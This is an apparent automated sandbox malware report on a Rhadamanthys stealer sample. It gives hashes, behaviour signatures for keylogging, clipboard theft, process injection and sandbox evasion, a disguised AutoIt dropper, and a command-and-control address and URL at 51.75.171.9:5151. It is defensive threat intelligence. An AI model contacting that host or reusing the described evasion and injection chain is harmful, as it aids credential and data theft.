Windows Analysis Report
ngPebbPhbp.exe

Overview

General Information

Sample name: ngPebbPhbp.exe
renamed because original name is a hash value
Original sample name: 5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350.exe
Analysis ID: 1560167
MD5: fa000351e26e17543f67e3dedc97d37e
SHA1: c59fc4f489ac15d5a1d455abbf0c3c5ad6fcc189
SHA256: 5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350
Tags: 77-105-161-194exeuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected Autoit Injector
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection

barindex
Source: ngPebbPhbp.exe ReversingLabs: Detection: 55%
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.3% probability
Source: ngPebbPhbp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ngPebbPhbp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00B0F826
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW, 0_2_00B21630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_003DE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003E9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003EA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_003EA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose, 7_2_003E65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E7248 FindFirstFileW,FindClose, 7_2_003E7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_003E72E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 16_2_00DFE387
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFD836
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFDB69
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E09F9F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E0A0FA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 16_2_00E0A488
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose, 16_2_00E065F1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 16_2_00E072E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E07248 FindFirstFileW,FindClose, 16_2_00E07248
Source: global traffic TCP traffic: 192.168.2.4:49736 -> 51.75.171.9:5151
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003ED7A1 InternetReadFile,SetEvent,GetLastError,SetEvent, 7_2_003ED7A1
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2078930988.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2216834063.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000000.2185326660.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8
Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 7_2_003EF45C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_003EF6C7
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 16_2_00E0F6C7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 7_2_003EF45C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 7_2_003DA54A
Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_7d31fd25-6
Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_98c403a2-e
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00409ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 7_2_00409ED5
